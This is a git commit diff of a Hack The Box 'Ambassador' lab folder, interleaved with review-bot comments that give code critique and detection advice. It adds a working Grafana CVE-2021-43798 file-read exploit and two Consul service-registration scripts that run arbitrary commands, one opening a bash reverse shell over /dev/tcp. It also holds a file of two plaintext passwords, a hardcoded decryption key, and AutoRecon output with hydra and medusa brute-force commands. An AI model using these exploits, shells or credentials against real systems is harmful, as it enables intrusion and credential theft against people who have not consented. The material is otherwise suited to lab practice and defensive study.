old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions

104
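--- a/HTB/ambassador/50581.py
+++ b/HTB/ambassador/50581.py
@@ -0,0 +1,104 @@
+# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
+# Date: 08/12/2021
+# Exploit Author: s1gh
+# Vendor Homepage: https://grafana.com/
+# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
+# Version: V8.0.0-beta1 through V8.3.0
+# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
+# CVE: CVE-2021-43798
+# Tested on: Debian 10
+# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+import requests
+import argparse
+import sys
+from random import choice
+plugin_list = [
+"alertlist",
+"annolist",
+"barchart",
+"bargauge",
+"candlestick",
+"cloudwatch",
+"dashlist",
+"elasticsearch",
+"gauge",
+"geomap",
+"gettingstarted",
+"grafana-azure-monitor-datasource",
+"graph",
+"heatmap",
+"histogram",
+"influxdb",
+"jaeger",
+"logs",
+"loki",
+"mssql",
+"mysql",
+"news",
+"nodeGraph",
+"opentsdb",
+"piechart",
+"pluginlist",
+"postgres",
+"prometheus",
+"stackdriver",
+"stat",
+"state-timeline",
+"status-histor",
+"table",
+"table-old",
+"tempo",
+"testdata",
+"text",
+"timeseries",
+"welcome",
+"zipkin"
+]
+def exploit(args):
+s = requests.Session()
+headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
+while True:
+file_to_read = input('Read file > ')
+try:
+url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
+req = requests.Request(method='GET', url=url, headers=headers)
+prep = req.prepare()
+prep.url = url
+r = s.send(prep, verify=False, timeout=3)
+if 'Plugin file not found' in r.text:
+print('[-] File not found\n')
+else:
+if r.status_code == 200:
+print(r.text)
+else:
+print('[-] Something went wrong.')
+return
+except requests.exceptions.ConnectTimeout:
+print('[-] Request timed out. Please check your host settings.\n')
+return
+except Exception:
+pass
+def main():
+parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
+parser.add_argument('-H',dest='host',required=True, help="Target host")
+args = parser.parse_args()
+try:
+exploit(args)
+except KeyboardInterrupt:
+return
+if __name__ == '__main__':
+main()
+sys.exit(0)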
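Review bot: The `# References:` line in the header ends in `j47p47p`, a duplicated suffix that does not match the advisory id on the `# Vulnerability Details:` line, so the link is dead; it should read `# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p`. The `#!/usr/bin/env python3` and coding lines sit below ten comment lines, where neither has any effect even though the file is committed as executable. In `exploit()`, `except Exception: pass` discards every error other than a connect timeout, and `verify=False` is passed without comment. For anyone reading this as a detection reference: the request it builds is a GET under `/public/plugins/<plugin-id>/` followed by a run of `../` segments, which is what to search for in Grafana and reverse-proxy access logs, and the remedy is moving off the affected range named in the header (8.0.0-beta1 through 8.3.0).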

18
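--- a/HTB/ambassador/ape.py
+++ b/HTB/ambassador/ape.py
@@ -0,0 +1,18 @@
+import base64
+from termcolor import colored
+from secure import decrypt
+secret_key = "SW2YcwTIb9zpOOhoPsMm"
+ciphertext = "dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069"
+encrypted = base64.b64decode(ciphertext.encode())
+try:
+pwdBytes, _ = decrypt(encrypted, secret_key)
+except:
+pwdBytes = None
+if pwdBytes is None:
+print(colored(f"[!] Unable to decrypt password..\n", "red"))
+else:
+print(colored(f"[*] Decrypted password: {pwdBytes}\n", "green"))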
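Review bot: The bare `except:` around `decrypt(encrypted, secret_key)` collapses every failure (a bad key, malformed input, even a KeyboardInterrupt) into `pwdBytes = None`, so the "Unable to decrypt" message never says why; `except Exception as exc:` with `exc` included in the message keeps the cause. The first `print` uses an f-string with no placeholders. `secret_key` and `ciphertext` are committed as literals next to the `passwords` file; if the key turns out to be a product default rather than one set on this host, that is the finding worth recording, since anything encrypted under a default key is recoverable by whoever obtains the ciphertext, and the fix on the server side is a unique key plus rotation of the stored credential.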


@@ -0,0 +1,65 @@
'''
- Author: @owalid
- Description: This script exploits a command injection vulnerability in Consul
'''
import requests
import argparse
import time
import random
import string
def get_random_string():
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(15))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-th", "--target_host", help="Target Host (REQUIRED)", type=str, required=True)
parser.add_argument("-tp", "--target_port", help="Target Port (REQUIRED)", type=str, required=True)
parser.add_argument("-c", "--command", help="Command to execute (REQUIRED)", type=str, required=True)
parser.add_argument("-s", "--ssl", help="SSL", type=bool, required=False, default=False)
parser.add_argument("-ct", "--consul-token", help="Consul Token", type=str, required=False)
args = parser.parse_args()
protocol = "https" if args.ssl else "http"
url = f"{protocol}://{args.target_host}:{args.target_port}"
consul_token = args.consul_token
command = args.command
headers = {'X-Consul-Token': consul_token} if consul_token else {}
command_list = command.split(" ")
id = get_random_string()
data = {
'ID': id,
'Name': 'pwn',
'Address': '127.0.0.1',
'Port': 80,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"Args": command_list,
'Interval': '10s',
"Timeout": "86400s",
}
}
registerurl= f"{url}/v1/agent/service/register?replace-existing-checks=true"
r = requests.put(registerurl, json=data, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error creating check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} created successfully")
time.sleep(12)
desregisterurl = f"{url}/v1/agent/service/deregister/{id}"
r = requests.put(desregisterurl, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error deregistering check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} deregistered successfully")
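Review bot: `--ssl` is declared with `type=bool`, and argparse applies `bool()` to the raw string, so `--ssl False` (any non-empty value) still selects https; `parser.add_argument("-s", "--ssl", action="store_true")` is the usual form. `id = get_random_string()` shadows the builtin, and both `requests.put` calls pass `verify=False` without saying why. From the defensive side, the body registers a service whose `Check` carries `Args`, which an agent only executes when script checks are enabled; keeping `enable_script_checks` off (or using `enable_local_script_checks`, which limits script checks to the agent's local configuration) and not handing out tokens with service write permission closes this path. Because the script deregisters the service after about twelve seconds, a point-in-time look at the catalogue will usually miss it, so agent or audit logs are the more reliable place to look.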

26
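--- a/HTB/ambassador/exp.py
+++ b/HTB/ambassador/exp.py
@@ -0,0 +1,26 @@
+#!/usr/bin/python3
+import requests, argparse
+parser = argparse.ArgumentParser()
+parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
+parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
+parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
+parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
+parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
+parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
+args = parser.parse_args()
+if args.ssl:
+target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
+else:
+target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
+headers = {"X-Consul-Token": f"{args.token}"}
+json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
+try:
+requests.put(target, headers=headers, json=json, verify=False)
+print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
+except:
+print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
+exit(1)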
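Review bot: `exp.py` and `exploit.py` are line-for-line identical in this commit, so one of them is redundant and everything below applies to both. The `try` covers only transport errors and the response is discarded, so "Request sent successfully" is printed for any HTTP status, and the bare `except:` hides what actually failed. `json = {...}` reuses the name of the standard-library module, and `--token` is taken on the command line, where it ends up in shell history and process listings. As a detection reference, the payload leaves a service with fixed `ID`/`Name` `gato` whose check `Args` start with `/bin/bash -c` and whose `Timeout` is `864000s`; a registered check that invokes a shell is worth alerting on, and disabling script checks on the agent (`enable_script_checks`) removes the execution step entirely.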

26
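--- a/HTB/ambassador/exploit.py
+++ b/HTB/ambassador/exploit.py
@@ -0,0 +1,26 @@
+#!/usr/bin/python3
+import requests, argparse
+parser = argparse.ArgumentParser()
+parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
+parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
+parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
+parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
+parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
+parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
+args = parser.parse_args()
+if args.ssl:
+target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
+else:
+target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
+headers = {"X-Consul-Token": f"{args.token}"}
+json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
+try:
+requests.put(target, headers=headers, json=json, verify=False)
+print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
+except:
+print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
+exit(1)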

2
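--- a/HTB/ambassador/passwords
+++ b/HTB/ambassador/passwords
@@ -0,0 +1,2 @@
+messageInABottle685427
+dontStandSoCloseToMe63221!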
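Review bot: This file adds two plaintext passwords to the repository, and deleting it in a later commit will not remove them from history. If either value is in use anywhere beyond the lab host, it should be rotated. Going forward, loot files like this are better kept out of the tree with an ignore rule (for example `HTB/**/passwords`, a constructed pattern) or stored encrypted.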


@@ -0,0 +1,16 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ppp found on tcp/3000.
[*] mysql found on tcp/3306.


@@ -0,0 +1,29 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
curl -sSikf http://10.10.11.183:80/robots.txt
curl -sSik http://10.10.11.183:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"
```


@@ -0,0 +1,41 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.183
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.183
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.183:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.183/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.183 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.183/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.183 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.183:80 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.183:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_wpscan.txt"
[*] mysql on tcp/3306
[-] (sqsh) interactive database shell:
sqsh -U <username> -P <password> -S 10.10.11.183:3306
```


@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.41 (Ubuntu)


@@ -0,0 +1,110 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.078s latency).
Scanned at 2023-01-24 07:22:49 EST for 335s
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa 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
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:34 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:39 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 66
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: CQA;\x02((\x1DG(\x0E&BtT@27\x0B%
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23
SF::34\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:24 2023 -- 1 IP address (1 host up) scanned in 335.34 seconds
```


@@ -0,0 +1,110 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.047s latency).
Scanned at 2023-01-24 07:22:49 EST for 294s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa 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
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:22:57 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:02 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 43
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x01g1\x0D<8\x19#\x08@u6\x18S\x06VdJ\x0D[
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22
SF::57\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
